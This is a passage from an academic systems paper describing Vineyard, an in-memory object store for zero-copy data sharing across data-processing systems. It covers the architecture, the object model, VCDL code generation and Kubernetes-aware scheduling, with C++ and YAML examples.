and Rust) to integrate with data processing systems.\nWith the SDK, an object can be retrieved from Vineyard by its ID via get() , and new objects can\nbe constructed via put() for other systems to consume later. The object returned from the local\nVineyard is a language-native object ( e.g.,numpy.ndarray in Numpy) while the payloads of the\nobject are still kept in the shared memory managed by Vineyard daemon without copy. To achieve\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:7\nHost 1 …\nMetadata Service Object \nmanager Applications \nVineyard Client \nIPC \nServer RPC \nServer \nVineyard \ndaemon \nExternal storage (HDFS/S3) I/O \nConnector \nHost 2 Object \nmanager Applications \nVineyard Client \nRPC \nServer IPC \nServer \nI/O \nConnector 1\n2 3\n4\n7\nid=put(obj) \nobj=get(id) FUSE Type Registry \npull(type) 5\n6\nVineyard \ndaemon register(type) \npull(type) \nFig. 3. System Overview.\nthese, the SDK includes an IPC client to Vineyard and communicates with the Vineyard daemon on\nthe same host via the UNIX-domain socket. 
Besides the IPC client, the Vineyard SDK includes a\nRPC client as well to communicate with the Vineyard daemon on remote hosts via the TCP socket.\nThe RPC client is used to send requests to the Vineyard daemon on remote hosts to complete the\nrequests sent from peers such as retrieving metadata and migrating an object from/to the local\nVineyard daemon.\nIPC/RPC server (labeled by\n2 and\n3 ). An IPC server listens to the requests from the clients in the\nsame host. It then interacts with the object manager to complete the requested tasks such as object\ncreation, accessing and deletion. Requests are organized into queues and consumed asynchronously\nand concurrently. A completion reply is sent to the client when a request is done. For example, a\nclient that sends a GET_OBJECT request will receive a reply with metadata dictionary and a set of\nfile descriptors, then it can create memory-mapped blobs first and construct the object with the\nmetadata and the blobs. An RPC server listens requests from clients in remote hosts to complete\nthe requests sent from peers such as retrieving metadata and migrating an object from the remote\nVineyard daemon.\nObject manager (labeled by\n4 ). The payloads (blobs) of an object are stored in the in-memory\nVineyard object store, which lives in a Vineyard daemon process on every host, thus different\ncomputing processes running on the same host can share data through the object store. The\nobject manager takes charge of orchestrating these payloads such as allocation, movement, seal\nand deletion. Note that an object is mutable after creation and invisible to other processes until\nit is sealed. Once sealed, the object becomes immutable ,i.e.,cannot be modified anymore, and\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:8 Wenyuan Yu et al.\nvisible to other processes. There are two main reasons: (i) immutable objects suffice for most data\nanalytics [40]; and (ii) they reduce the complexity of concurrent data accesses.\nType registry (labeled by\n5 ). In order to support cross-system object accessing, Vineyard provides\na type registry for users to register user-defined data structures, a.k.a. how the payloads and\nmetadata constitute an object, and how to reinterpret an object. Like Protobuf, Vineyard provides\nan IDL (intermediate description languages) named VCDL (detailed in §4.2) for users to define their\ncustomized data structures. When a system tries to get/putan object from/to the object store, it\nwill lookup the registry to transform the registered type in Vineyard into its own internal type\nor vice versa. The type registry is implemented as a key-value map, with the name of the type\nas the key, and the concrete description of this type as the value. For example, the key may be\n“foo::bar::Graph::1.10.0 ”, and the value is a set of VCDL files.\nI/O connector (labeled by\n6 ). The interfaces of the I/O connector are provided to enable pluggable\nadapters, which allows Vineyard to load/store data from/to external storage such as local filesystem,\nHDFS and S3, in common formats like Parquet, ORC, HDF5 and CSV, and migrate data from remote\nVineyard daemon over networks. Built on the I/O connector, Vineyard supports to spill cold objects\nunder high memory pressure, and load from external storage back when those spilled objects been\nrequested, as well checkpoint/reload to/from external storage for fault-tolerance. 
In addition, cache\nand prefetch are adopted to alleviate the I/O overheads in these cases.\nMetadata service (labeled by\n7 ). Payloads of objects are stored as blobs in local shared memory\nwhile the metadata of objects are stored in a distributed, consistent key-value store ( e.g.,etcd [ 22]\nand Redis) for object resolution. Metadata is essentially key-value pairs that describe how a group\nof blobs constitute an object. The metadata service guarantees the synchronization and consistency\nof metadata across the cluster, and metadata connects correct blobs when the objects are created,\ndeleted, or migrated from a remote host. The consistency also allows Vineyard to support distributed\nobjects called “ collection ”, which is composed of objects on multiple hosts across the cluster as well\nas external storage (see details in §4.1).\nVineyard is designed to be extensible, and its functionality is divided into several loosely-coupled\nmodules for users to customize the integration. (i) Vineyard provides an IDL named VCDL to enable\nusers to register customized data structures succinctly. (ii) APIs for I/O connectors to exchange\nVineyard objects with other storage media, file formats and networking stacks. (iii) Vineyard\nalso provides useful modules to facilitate the integration. For example, Vineyard provides format\nconverters for conversions of common data formats ( e.g.,row-based tables to/from column-based\nones), and FUSE (Filesystem in userspace) drivers [ 43], to provide file system APIs to project\nVineyard objects to/from common file formats ( e.g.,Parquet, ORC and CSV). Incorporating these\nmodules in a workflow, Vineyard can liberate users from the tedious task of implementing and\nintegrating such logic with individual data processing systems.\n3.2 Challenges\nC#1: How to share complex objects efficiently . At the center of Vineyard , the way it organizes\nand serves objects is crucial to its efficacy. It is challenging and non-trivial as well. There are\nthree key criteria to meet: (i) Support big data. Many intermediate data is larger than the memory\ncapacity of a single machine or even the aggregated memory of a cluster. Vineyard should support\nlarge objects, making it able to take advantage of distributed computing and external storage. (ii)\nObject composability. Many data structures, e.g.,graphs, are complex , and composed of several\nother objects ( e.g.,arrays and hash indices are used in graphs). In addition, it is very common that\na task incrementally creates a new object from an existing one with small changes. These two\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:9\ncharacteristics require to express an object in a composable fashion. (iii) High efficiency. As we\ndiscussed, the performance of data sharing is largely affected by (de)serialization and extra memory\nmovements. The object store of Vineyard needs to be designed to minimize such costs.\nC#2: How to reduce integration effort. For cross-system data sharing, a downstream task does\nnot understand the data type of the object put by its upstream tasks, unless Vineyard provides a\nmechanism to register the type. To this end, there are three key requirements to satisfy: (i) Avoid\nintrusive integration. Vineyard should avoid hard-coding the type into the downstream task, by\nmodifying its source code or re-compilation. (ii) Serve the polyglot workflow . 
As a language-agnostic\nframework, Vineyard should ensure cross-language interoperability to achieve high flexibility and\nperformance in ubiquitous polyglot workloads. It is challenging even with standard FFI (Foreign\nFunction Interface), as language boundaries often add performance overheads because the cross-\nlanguage interface has to marshal foreign objects. (iii) Less boilerplate code. Vineyard needs to\ninsulate users from wrapping guest-language functions with annoying glue code by automatically\ngenerating the boilerplate code to achieve high flexibility.\nC#3: How to work in cloud-native environments. Vineyard is designed as a daemon to serve\ndiverse applications in cloud-native environments. Therefore, it is important for Vineyard to (i)\nhelp the workflow scheduler to consider data affinity when launching a new task and automatically\nprefetching the required data into memory when the downstream tasks are scheduled to a group\nof new hosts; (ii) handle exceptions such as shutdown, operation abort, and memory exhaustion\nto work robustly in production environments; and (iii) provide stable performance in a variety of\nscenarios such as burst objects pouring, and storing extremely small/large objects. The object store\nofVineyard should hide the system complexity from users and handle the above cases gracefully.\n4 DESIGN AND IMPLEMENTATIONS\nIn this section, we introduce key designs and implementations to overcome the above challenges.\n4.1 Sharing of Complex Objects Efficiently\nAs discussed in C#1 of§3.2, sharing complex objects needs to simultaneously meet the requirements\nofbig-data ,composability , and efficiency . First, we introduce the data model of Vineyard objects.\nNext, we introduce how these goals are achieved.\nData model. Vineyard objects are chunk-based, distributed, and immutable. From common practices\nof big data processing, we observed that large-scale data is often chunked and distributed processed\nin chunk-granularity. Chunk-granularity brings flexibility and efficiency, and the data model of\nVineyard aligns with such a design. More specifically, the objects in Vineyard can be divided into\nthree categories:\n(1)Blob. A blob is a big amorphous binary data structure stored as a single entity. Blobs are typically\nbuffers that consume consecutive memory. In Vineyard , blobs are basic units to constitute the\npayloads of a complex object.\n(2)Local object . A local object is a set of blobs with metadata to describe how these blobs constitute\na complex object. The metadata is a dict-like structure, with field names as keys and primitive\ntypes ( e.g.,int, double and String), blobs, or other objects as values. Values of the same type can\nbe repeated zero or more times for a given key, and their order is preserved (like Protobuf). Local\nobjects are conceptually similar to the aforementioned chunks in data processing systems. For\nexample, a local object can be a partition of a RDD in Spark [ 65], a part of a table in ClickHouse,\nor a partition of a graph in PowerGraph. “Local\" means the object can fit in the memory of the\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. 
template <typename T>
class Iterator {
  // Get the next object in the collection.
  iterator next();
  // Get the next local object in the collection.
  iterator next_local();
};

template <typename T>
class Collection {
  // Return the reference of a specific local object.
  iterator at(int idx);
  // Return the number of objects of the collection.
  size_t size();
  // Return the iterator of the first object.
  iterator begin();
  // Return the iterator of the first local object.
  iterator local_begin();
  // Return the iterator of the past-the-end object.
  iterator end();
};

class CollectionBuilder {
  // Put the object of given id to the collection.
  void put(size_t idx, ObjectID id);
  // Seal the collection to prevent mutation.
  void seal();
};
Fig. 4. The APIs of Collection.
local host, i.e., once a client tries to GET a local object, Vineyard will first make sure all its blobs are present in the host memory before sharing them through memory mapping.
(3) Collection. A collection is a set of local objects of the same type with metadata to describe how these local objects logically constitute a global object and on which hosts these local objects are located. Parts of a collection's objects may be stored in external storage or on remote hosts. Vineyard provides APIs for users to pick a specific local object from a collection or just iterate over all interior objects or only the local ones, as shown in Figure 4.
Supporting big data scenarios. To store large objects as collections in either external storage or distributed memory, Vineyard provides corresponding mechanisms to move data between external storage and memory or between different hosts.
Moving blobs between external storage and memory. In big data applications, it is common that data cannot fit in memory, and users may also want to persist data as checkpoints. (i) Vineyard provides a spilling mechanism that can swap some blobs from memory to external storage or a remote object store when memory pressure is high. The spilling process can be triggered automatically when either Vineyard fails to allocate new shared-memory blobs or the memory usage reaches a specified threshold. With I/O connectors, Vineyard can leverage various external storage systems, e.g., local filesystem, HDFS, and S3, for spilling. By default, the least recently used (LRU) policy is adopted for automatic spilling. Users can keep required objects in memory during computing with the pin() API to prevent objects from being spilled. Users can also rely on auto-spilling by utilizing the basic put()/get() APIs, or they can fully manage the spilling process to control the location of each blob at any time with the evict() and load() APIs, lest auto-spilling introduce unpredictable overheads, and thus deliver guaranteed performance. Further, users are allowed to give hints when getting a Collection to indicate the expected access patterns; e.g., for a sequential scan, the I/O workers will pre-reload the spilled blobs to overlap the computation and communication and reduce the I/O overhead. (ii) For checkpointing, Vineyard provides a save method for users to copy the entire local object or collection into external storage. A load method is provided to restore an object from a checkpoint; a brief usage sketch of these spilling and checkpointing controls is given below.
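For illustration, the following client-side sketch drives these controls explicitly. The Collection iteration follows Figure 4, while the client type, the id() accessor and the exact signatures of pin()/evict()/load()/save() are assumptions made for exposition rather than the verbatim SDK API.

// Illustrative sketch; assumes a connected IPC client and the declarations of Figure 4.
void ProcessAndCheckpoint(Client& client, ObjectID collection_id) {
  Collection<DataFrame> frames = client.Get<Collection<DataFrame>>(collection_id);

  // Iterate only over the chunks that are resident on this host.
  for (auto it = frames.local_begin(); it != frames.end(); it = it.next_local()) {
    client.pin((*it).id());   // keep this chunk in memory while computing on it
    Process(*it);             // user-defined computation
  }

  // Explicitly spill a cold chunk and reload it before the next access;
  // otherwise the LRU-based auto-spilling handles this transparently.
  auto cold = frames.at(0);
  client.evict((*cold).id());
  client.load((*cold).id());

  // Checkpoint the whole collection into external storage.
  client.save(frames.id(), "s3://bucket/checkpoints/frames");
}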
When Vineyard clients send requests to save or load an object, the I/O\nworker will block other requests until the process completes to avoid data race conditions.\nFetching blobs from remote hosts. Since objects of a collection are scattered in multiple hosts, appli-\ncations may access a non-local object. To support such remote object accessing, the Vineyard object\nmanager first queries the location of the object in metadata service, then it requests the I/O connec-\ntor with the object identifier and the location, and finally, the I/O connector will communicate with\nthe data holder to access the object. The fetched objects will be stored in the local object manager\nand this object will be marked as local. The fetching can be triggered automatically or manually in\neither asynchronous or synchronous mode. After receiving the fetching request, the I/O connector\nwill fully handle the data movement. Since the I/O connector allows developers to integrate diverse\nnetwork libraries such as verbs for RDMA, gRPC [ 37], or DPDK [ 26], it is easy to achieve high\nperformance in diverse scenarios.\nObject composability To achieve composability, Vineyard adopts a decoupled design , where the\nmetadata ofobjects are managed separately from the payloads . The metadata of each object (identi-\nfied by an object ID) is represented as a set of key-value pairs. Taking the Collection<DataFrame>\n(a simplified dataframe) shown in Figure 5 as an example, it is represented by its unique ID “ 0001 ”,\nnames of its two member objects (“ 0012 ” and “ 0013 ”) located on different hosts, and each object\nhas two columns (namely “ UserID ” and “ ItemID ”) with two objects IDs associated with two Array\nobjects. Each Array object corresponds to a column of the dataframe, and is linked to a blob that\nrepresents the payload of the Array object. The Array objects can be accessed either independently\nor as a part of the DataFrame object or as an indirect part of the Collection<DataFrame> object.\nRecall that objects are immutable in Vineyard , to add a new column Amount to the DataFrame\nobject 0012 ,Vineyard simply create a new object “ 0014 ” to replace the old object “ 0013 ” with\nan extra column “ 0120 ” and reuse the columns “ 1005 ” and “ 1006 ”, without copying the entire\nDataFrame object, saving memory and improving performance.\nThis decoupled design brings two benefits to Vineyard : (i) referring to the same blob by different\nobjects is allowed, without worrying about data race and consistency issues since objects are\nimmutable in Vineyard , and metadata is managed separately. (ii) It is very common that a data\nanalytics job creates a new object 𝑂′from an existing object 𝑂with small changes and keeps both\n𝑂and𝑂′inVineyard for later processing. Compared with duplicating the same payloads twice,\nincrementally creating a new object 𝑂′from an existing object 𝑂with small changes is more time\nand space-efficient.\nVineyard provides out-of-the-box efficient implementation for de-facto standard data structures,\ne.g.,Vector ,HashMap ,Tensor ,DataFrame andGraph in the SDK, and integrates those data types\nwith widely-adopted data processing systems, e.g.,Numpy ,Pandas ,PyTorch . Thanks to the decou-\npled design, these data structures can be directly used as the basic building blocks when users\nattempt to construct and share more complex system-specific data structures in their applications.\nEfficiency. 
With the decoupled design, the overheads of creating and accessing an object in Vine-\nyard can come from two sources, namely dealing with the payloads and metadata. For most common\ndata types, the vast majority of the overheads are the payload part. For example, the DataFrame\nobjects shown in Figure 5 can represent a table with tens of billions of records in only a handful\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:12 Wenyuan Yu et al.\n2 41 41 32 32 1ItemID UserID [0012 , 0013 ]Collection<DataFrame> Type 0001 ID \n24.0 Amount \n139.9 \n24.9 \n64.2 58.0 \n1007 Blob Array Type ID 1006 \n 1022 Blob Array Type ID 0120 \nType ID 1007 \nBlob Size 2\nAddr 0x00a726c5 Type ID 1022 \nBlob Size 2\nAddr 0x00a726d4 Host 1 \nHost 2 [1005 , 1006 ] Cols [“UserID”, “ItemID”] Names DataFrame Type ID 0012 \nDataFrame \n[“UserID”, “ItemID”, \n“Amount”] ID \nNames Type 0014 \nCols [1005, 1006, 0120] …\n…\n0012 \n0013 Add \nColumn \nFig. 5. Object Storage and Data Sharing.\nof key-value pairs as metadata (less than 1KB) while the size of blobs is greater than tens of GBs.\nTo achieve high efficiency, the blobs are directly memory-mapped to the clients by Vineyard for\naccessing payloads with zero-copy . Generally, the payload data are managed by individual systems\nbefore handing over to Vineyard , therefore at least one copying is required to move the data into\ntheVineyard object manager for the first task in each workflow. Fortunately, it is still possible to\noptimize out such copying. Vineyard provides a special memory allocator to allow dynamic memory\nallocation directly on its shared memory pools from processes of the data processing systems. The\nmemory allocator serves as a drop-in replacement for the default malloc /free functions using\ntheLD_PRELOAD [3], if the target systems allow the replacement of their own memory allocators.\nWhen put() native objects to Vineyard , the client will skip copying the blobs that already reside\nonVineyard ’s shared memory and link metadata to the existing blobs.\n4.2 Minimize high integration effort\nIn§4.1, we have described how objects are organized in Vineyard , and explained how Vineyard\nshapes the performance with the help of object composability. However, sharing objects between\nsystems via memory mapping in real-life workflows is still intricate. (i) To exploit payload common-\nality, users have to construct from the metadata and payloads manually since there is no standard\nway to cast a type from one system to another. For example, in Figure 2 (a), users store a PyTorch\nTensor as a blob into Vineyard , then getand reinterpret it as a NumPy ndarray . Such manual\nintegration is ad-hoc and users have to write many error-prone and boilerplate codes. Worse still,\nsuch integration is not extensible: to share data between 𝑀upstream tasks and 𝑁downstream tasks,\nrepeatedly conducting 𝑀×𝑁integrations case by case can be daunting enough to deter the usage of\nVineyard for larger workflow. (ii) To exploit interface commonality, users should first introduce the\nmetadata and methods of the intermediate data structure into a downstream task, then implement\na wrapper to enable method sharing. For example in Figure 2 (b), to share a livegraph::Graph\nto GraphScope, users first need to link LiveGraph as a library dependency during building, then\nforward methods of GraphScope::Fragment likeg.edges(v) to methods of livegraph::Graph\nlikeg.get_edges(v) . Similarly, such integration is also not extensible. 
Enabling method sharing\nin polyglot workflows requires further effort. For example, although Griaph.GraphType (Java\nclass) and GraphScope::Fragment (C++ class) both represent graphs in their engines respectively\nand have similar interfaces, nevertheless, these systems still have gaps that need users to bridge\nmanually, i.e.,different memory management models in different programming languages. One\nway to achieve it is to re-implement the logic or implement an FFI (Foreign Function Interface)\nwrapper of the methods of GraphScope::Fragment in Java, then wrap the methods of Java-version\nGraphScope::Fragment to imitate behaviors of methods of Giraph.GraphType , which is hard to\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:13\n1// type .h\n2template <typename T>\n3[[shared ]]class Array {\n4 private :\n5 [[shared ]]Blob b;\n6 size_t len ; // non - shared property\n7 public :\n8 [[shared ]] T getItem ( size_t idx ) {...}\n9};\n10\n11template <typename T>\n12[[shared ]]class DataFrame {\n13 private :\n14 [[shared ]] Repeated < String > names ;\n15 [[shared ]] Repeated <Array <T>> cols ;\n16 public :\n17 [[shared ]] Array <T> getCol ( size_t idx ){\n18 return cols . get ( idx );\n19 }\n20};\nFig. 6. An example of VCDL.\nmaintain and optimize. Once the methods change in one version, users have to re-implement them\nagain to keep the consistency. To be more specific, the integration burden stems from the following\ntwo aspects:\n(1) No common formats for some data structures between upstream and downstream systems. With-\nout a common format, users have to manually implement low-level memory assignment case by case.\n(2) Re-implement methods for method sharing. Since upstream and downstream systems reside in\ndifferent processes (or even implemented with different languages), users require to re-implement\nthe logic of shared complex objects to enable method sharing.\nVineyard Class Description Language. To liberate users from such an interminable integration\nburden, Vineyard provides an IDL (intermediate description languages) named Vineyard Class\nDescription Language (VCDL). Inspired by Protobuf, VCDL allows users to describe the shared\nobjects and the methods over objects once, then generates the boilerplate codes automatically for\ndifferent programming languages. With VCDL, users can define and implement new types of data\nstructures succinctly. To ensure the expressivity of VCDL, we design VCDL as a C++ dialect, which\nkeeps a majority of the features of C++, as shown in Figure 6. Like C++ class definition, a data\nstructure defined with VCDL ( i.e.,class) contains members and methods; objects are organized\nin acomposable fashion: they can be other user-defined data structures. To enable Vineyard code\ngeneration, we only add several built-in types and directive annotations into the dialect.\nBuilt-in data types. VCDL recognizes primitive types such as int,double andString as metadata\nentries. Besides primitive types, VCDL predefines object-related types such as Blob andRepeated\nto facilitate users to describe the components of their objects. A Blob represents a large binary\nobject with a given size, and is used to describe the actual payload of a shared object. A Repeated\nis a sequence container that repeats its field any number of times (including zero), and the order\nof the repeated values will be preserved. For example, column names of a dataframe (line 6 in\nFigure 7). 
This concept is from Protobuf, and it is helpful to group a bunch of objects together to\nachieve composability. With the primitive types, predefined types for objects and the composable\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:14 Wenyuan Yu et al.\n1// builders .h\n2template <typename T>\n3[[builder ( DataFrame )]] ColWiseDataFrameBuilder\n4 :public DataFrameBuilder {\n5 private :\n6 Repeated < String > names ;\n7 Repeated < ArrayBuilder <T>> col_builders ;\n8 protect :\n9 DataFrame seal () {\n10 DataFrameBuilder :: set_names ( names );\n11 DataFrameBuilder :: set_cols ( col_builders );\n12 return DataFrameBuilder :: seal ();\n13 }\n14 public :\n15 void addCol ( ArrayBuilder <T> col , String col_name ) {\n16 names . push_back ( col_name );\n17 // Enable zero - copy if possible .\n18 col_builders . emplace_back ( col );\n19 }\n20};\n21\n22template <typename T>\n23[[builder ( DataFrame )]] RowWiseDataFrameBuilder\n24 :public DataFrameBuilder {\n25 private :\n26 Repeated < String > names ;\n27 Repeated < ArrayBuilder <T>> col_builders ;\n28 protect :\n29 DataFrame seal () {\n30 DataFrameBuilder :: set_names ( names );\n31 DataFrameBuilder :: set_cols ( col_builders );\n32 return DataFrameBuilder :: seal ();\n33 }\n34 public :\n35 void setSchema ( Repeated < String > schema ) {\n36 names = schema ;\n37 cols_builders . resize ( names . size ())\n38 }\n39 void addRow ( Repeated <T> row ) {\n40 for ( size_t i =0; i< row . size (); ++i) {\n41 cols_builders [i]. push_back ( row [i])\n42 }\n43 }\n44};\nFig. 7. An example of VCDL builders.\ndesign, complex objects in data processing systems can be hierarchically mapped to Vineyard ’s\nobject types and make it convenient to integrate and share with Vineyard .\nAnnotation shared .In VCDL, classes that annotated with shared annotation mean that systems\ncanPUT/GET objects of these types to/from Vineyard for sharing. All of their members with shared\nannotation will be kept as metadata in Vineyard and shared across systems and hosts. Other mem-\nbers without annotations can be reconstructed from members with shared annotation, e.g.,len\n(line 6) can be re-calculated by dividing the size of Blob bby the size of type Twithout needing\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:15\nto keep its value in Vineyard . All object types that are annotated with shared in VCDL must be\nimmutable, since objects in Vineyard cannot be modified once been sealed.\nAnnotation builder .To construct an instance of the type ( e.g.,DataFrame ) defined by VCDL, users\ncan implement specific classes tagged with builder annotations ( e.g.,builder(DataFrame) ), and\nprovide methods for an upstream task to build the data structure. As shown in Figure 7, users can\nwrite different builders to support a variety of scenarios. A seal() method must be provided in\neach builder to return the final immutable object from it. Base builders that directly interacts with\ntheVineyard client are automatically provided by Vineyard (e.g.,ArrayBuilder, DataFrameBuilder).\nAs mentioned in§4.1,Vineyard provides a memory allocator to allow memory allocation on its\nshared memory pools during the builder processes, to achieve zero-copy data sharing. VCDL\ncode generation can leverage such zero-copy ability. 
For example, in the line 18 of Figure 7, the\nArrayBuilder will check if the column is already in the Vineyard ’s shared memory poll, and avoid\ncopying when possible. Builders can be nested, since Vineyard objects are composable ( e.g.,member\ncol_builders of class ColWiseDataFrameBuilder<T> in Figure 7).\nCode generation. With VCDL, Vineyard can generate most of the glue code required by integration.\nThus, users can focus on the data structure they want to share. Specifically, the benefits of Vineyard\ncode generation are three-fold: (i) produce common formats; (ii) generate boilerplate code; (iii)\nenable cross-language optimizations.\nProducing common formats . To get an object put by an upstream system, the downstream system\nshould understand the data type of the object. For systems that adopt C++ as their programming\nlanguage, they can directly invoke the methods of data structures defined in VCDL, as VCDL is a C++\ndialect. To work with systems written in other languages, Vineyard will generate a new class defini-\ntion in their languages to access the methods and implementations defined in VCDL. VCDL wraps\nclasses described in VCDL as native classes in multiple guest languages instead of re-implementing\nthem in another language. It first leverages libclang [ 42] to get the ASTs (Abstract Syntax Trees) of\nVCDL classes to figure out the classes, members, and methods that need to be exposed to the guest\nlanguages for data access and creation. It then maps each class annotated with [[shared]] to a\nnative data type ( e.g.,interface for Java, struct for Rust) in the guest languages, and generates\nan FFI wrapper for each method that is annotated with [[shared]] in VCDL. Currently, VCDL sup-\nports C/C++, Java, Python and Rust as guest languages. When adding support for a new language,\nVCDL only requires to develop a code generator that handles the primitive type mappings and can\ngenerate classes and method wrappers in the guest language from the ASTs generated by libclang.\nGenerating boilerplate code. As discussed above, without Vineyard ’s code generation, users who\nwant to share intermediate data between systems have to write a lot of boilerplate code like field\ngetter and setter, which is common in cross-language wrapper generators e.g.,SWIG [ 18]. With the\nVCDL code generator in place, Vineyard first generates a common type of the class with annotation\nshared , then generates getters and setters for members tagged with annotation shared . Given a\ncommon type between upstream and downstream systems, users can always get the type defined\nin VCDL without re-implementing them manually. Moreover, the VCDL code generator can also\nhandle the generic types ( i.e.,thetemplate in C++ and Generics in Java) across languages. Gener-\nics is an essential language feature for the implementation of data processing systems. However,\nthe programming principles of generic may vary a lot in different programming languages ( e.g.,\nC++ and Java), and it is non-trivial to generate safe and efficient cross-language interfaces. Instead\nof simply mapping C++ template instantiations to parameterized types in Java, the VCDL code\ngenerator generates a unique class in Java for each instantiation of the same C++ template to\navoid type errors in native code.\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:16 Wenyuan Yu et al.\nEnabling cross-language optimizations. 
To ensure the performance, the VCDL code generator en-\nables optimizations to be applied across the boundaries between languages. The VCDL code\ngenerator reads annotated VCDL files and creates wrapper code (glue code) to make the corre-\nsponding C/C++ libraries available to other guest languages or to extend C/C++ programs with\na scripting language. Code generated for LLVM-based languages ( e.g.,C/C++, Rust) can be com-\npiled into LLVM bitcode (IR), and can be optimized and linked at the IR level with the help of\nthe LLVM LTO (link-time optimizations). For JVM-based languages, translated functions can be\noptimized ( e.g.,inlining) with the code of the target data processing system by JVM JIT. In addition,\nit also allows a large proportion of simple yet performance-critical routines ( e.g.,iterators) can be\ntranslated to efficient JVM bytecode. Fortunately, with the sun.misc.Unsafe mechanism of Java,\nlarge payloads/blobs can be also memory mapped off-heap and efficiently accessed from JVM. If\nfunctions cannot be translated, Vineyard will fall back to JNI (Java Native Interface) calls.\nDiscussion. With VCDL, integration is intuitive. Users first define required data structures (types)\nin VCDL, then they can directly implement their applications on generated data structures, or\nconvert the defined data structures to the existing native types in custom wrappers. With payload\nsharing, users just need to “cast\" the generated types to the native types. Such casting is zero-\ncopy and only requires to manipulate their metadata. With method sharing, users need to wrap\nmethods of native types with methods of generated types, which is also zero-penalty. If users fail\nto provide VCDL files for some reasons, Vineyard provides a FUSE driver that encapsulates the\nVineyard client to provide file system APIs, as shown in Figure 3. Since the FUSE driver provides\nfilesystem interfaces, objects have to be serialized as buffered bytes when users read/write objects\nfrom/to Vineyard , while buffered bytes will be automatically deserialized as objects when the file\nhandle are closed.\n4.3 Working in cloud-native environments.\nIn the cloud-native era, big-data analytics jobs are usually deployed as containerized applications,\nwhich are orchestrated by workflow engines ( e.g.,Apache Airflow [ 27], Dagster [ 21], Kedro [ 9]),\nand managed by Kubernetes. Vineyard is deployed as a Deployment on Kubernetes and managed by\nthe Kubernetes Operator [ 14]vineyard-operator . After applications have been submitted to a Ku-\nbernetes cluster, Vineyard will place the application pods near where its required inputs are located.\nBesides, by integrating with the workflow orchestration engine, Vineyard archives application-level\nfault tolerance. In this subsection, we will discuss how Vineyard addresses challenges proposed\ninC#3 in§3.2 in cloud-native environments.\nLocality awareness on Kubernetes. Vineyard archives alignment between application workers\nand their required inputs by integrating with the scheduler of underlying cloud-native infrastructure,\ni.e.,Kubernetes. The collections of Vineyard objects that will be shared across hosts are abstracted\nand organized as Custom Resource Definitions (CRDs) [ 13] in Kubernetes, making them observable\nand accessible from the scheduler component of the Kubernetes cluster. 
Developers can specify the\nrequired input objects for a task in the specification by the k8s.vineyard.io/required , which\nindicates the prerequisite tasks that generated the required inputs for this task. Once the upstream\ntasks have created outputs as CRDs, the current task itself will be ready for being scheduled. As\nshown in Figure 8, the task Brequires a CRD of type DistDataFrame<int> generated by task A.\nOnce the CRD generated by task Ais available, task Bwill be ready for being scheduled..\nVineyard implements a data-aware scheduling policy in a scheduler plugin for Kubernetes [ 5].\nSpecifically, given a task, Vineyard partitions required collections into local object collections and\nassigns collections of local objects to workers of this task. The scheduler plugin then inspects the\nlocation metadata from CRDs of those local objects and assigns the highest priority to the host\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.Vineyard: Optimizing Data Sharing in Data-Intensive Analytics 200:17\napiVersion: apps/v1 \nkind: ReplicaSet \nmetadata: \n name: A-extract \nspec: \n replicas: 4 \n template: \n spec: \n containers: \n - image: mysql-dumper:latest \n ... apiVersion: apps/v1 \nkind: ReplicaSet \nmetadata: \n name: B-PowerGraph-PR \n labels: \n k8s.orchard.io/required: \n - created-by: A-extract \n type: DistDataFrame<int> \n - ... \nspec: \n replicas: 4 \n ... \n \nAB\n $ kubectl get objects.orchard.io -ltype=\"DistDataFra me<int>\" \nNAME TYPE CREATE-B Y AGE \no000052f987f48706 DistDataFrame<int> A-extrac t 1s. \nFig. 8. Program a Workflow DAG on Vineyard\nwhere the required local objects are located for each worker of this task. In this way, the scheduler\ncan respect the locality of the required inputs and reduce the data transfer costs. As the cluster\nresources are dynamically changing and tasks may have their own access pattern on distributed\ncollections, remote data accessing is unavoidable. Vineyard ’sCollection abstraction in§4.1 fits\nsuch scenarios, and required objects will be migrated from remote instances by Vineyard when\nneeded. In environments where external Kubernetes scheduler plugin is not allowed to be deployed,\nVineyard provides a command line tool vineyardctl which accepts the workflow specification in\nYAML format and injects the node affinity annotations into the specification to route tasks as near\nto where their required inputs been placed as possible.\nVineyard implements workflow isolation with Session s, which is aligned with the Namespace\nmechanism in Kubernetes. Multiple sessions can be created in the same Vineyard cluster and each\nsession can be connected via its own UNIX-domain socket. Vineyard clients can only see and\nmanipulate objects in the connected session. When a workflow finishes and intermediate data can\nbe dropped, removing a session will clean up all objects in it.\nFault tolerance and data consistency. Failures are inevitable for big data analytics in a cloud-\nnative environment. Designed as an object store for intermediate data, Vineyard does not replicate\nobjects but provides the save(ObjectID,path) API and users can insert checkpoint tasks into their\nworkflows. Vineyard has been integrated with the failover mechanism of workflow orchestration\nengines. 
When application failure happens, the results produced by the last succeeded step are still\nkept in Vineyard and the workflow scheduler decides whether to reload data from checkpoints\nwith the load(path) API and rerun from the failed steps or restart from scratch.\nVineyard maintains an object dependency tree in metadata service and keeps a periodic heartbeat\nbetween instances. When Vineyard instance failure happens the heartbeat connection will be lost,\nthe failure would be detected by other instances and all objects that depend on objects resides\non the failed instance will be dropped recursively across the cluster. Tasks that get involved with\nthe garbage-collected objects will be marked as failed and the workflow scheduler will decide\nwhether to reload data from the last checkpoint and rerun affected tasks or propagate the error to\nusers. Vineyard uses external key-value storage ( e.g.,etcd [ 22], Redis, or Kubernetes CRDs) as the\nmetadata service backend, which is ACID-compliant and supports high-availability deployment.\nThus, the consistency and availability of metadata will not be affected by Vineyard instance failures.\nUsage patterns of big data systems. Big data analytics usually involves two kinds of objects:\nseveral large objects and many small objects. For extremely large objects, Vineyard provides 